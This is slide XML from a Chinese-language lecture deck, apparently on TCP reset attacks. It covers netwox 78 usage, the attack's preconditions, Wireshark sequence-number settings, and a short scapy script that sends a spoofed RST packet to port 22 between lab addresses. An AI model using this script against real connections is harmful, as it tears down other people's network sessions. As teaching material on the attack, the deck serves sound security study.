            <a:off x="566738" y="1752600"/>
            <a:ext cx="8001000" cy="4484712"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>Netwox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t> 78</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>号攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="304800" algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="780"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>命令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="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2400" kern="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>netwox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> 78 [-d device] [-f filter] [-s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>spoofip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>]</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spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="780"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</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spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="780"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-d|--device </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>device</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="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2400" kern="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>device</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> name {Eth0}</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spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="780"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-f|--filter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="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2400" kern="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>pcap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> filter</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spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="780"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-s|--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>spoofip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>spoofip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>      IP spoof initialization type {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>linkbraw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击成功的条件：攻击者需要能监听到用户机和目标机的通信，并且用该监听接口攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1990836993"/>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wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>截包设置</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Wireshark来观察网络流量，当显示TCP序列号时，默认情况下会显示相对序列号，它等于实际序列号减去初始序列号。如果要查看数据包中的实际序列号，则需要右键单击Wireshark输出的TCP部分，然后选择“协议首选项”。在弹出窗口中，取消选中“Relative Sequence Number and Window Scaling”选项。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D804C29F-986F-421B-AFE0-EF5640129314}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331640" y="1700808"/>
            <a:ext cx="6336704" cy="4521132"/>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89B5E-2389-47E2-B49B-D60C57500109}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>scapy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>手动攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED8AB042-AAC4-4AAB-86FD-50A43F721C0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>#!/usr/bin/python3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>scapy.all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> import *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>print("SENDING RESET PACKET.........")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>  = IP(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>10.0.2.6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>10.0.2.7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> = TCP(sport=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>46304</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>dport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>22</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>,flags="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>R",seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3206705447</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>pkt = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ls(pkt)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>send(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>pkt,verbose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>=0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>reset.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
